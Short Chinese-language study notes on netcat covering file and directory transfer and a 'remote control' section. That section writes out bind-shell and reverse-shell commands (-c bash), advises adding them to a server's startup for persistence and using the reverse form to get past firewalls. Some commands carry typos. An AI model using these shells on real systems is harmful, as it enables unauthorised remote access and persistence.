一、nc(瑞士军刀)
1、-v 输出详细的信息 -n 如果后面是域名不会进行dns解析(telnet)
2、文本传输:
类似于socket一个作为服务端,一个作为客户端。
服务端:nc -l -p 端口
客户端: nc -vn ip port
在电子取证的时候会用到。用 | 管道符将客户端输出的结果发送到服务端。
传输文件:
接收方: nc -lp 333>1.txt
发送方:nc -nv 111.11.11.11 333 <2 .txr
3、目录传输
tar -cvf - xu
4、远程控制
方法一; nc -lp 333 -c bash(nc -vn 192.168.22.22 333)
方法二:nc -lp 333 (nc -vn -192.145.11.1 333 -c bash)
可以将该命令写成脚本,然后放在服务器的开机启动项里面。有些网站因为防火墙进制第一种方式,所以可以采用第二种方式。
在window用户中应将bash 改为cmd
5、缺陷
1、明文传输,容易被嗅探(可以通过系统加密方法)
2、缺乏身份验证机制,不安全,容易被其他人盗用。
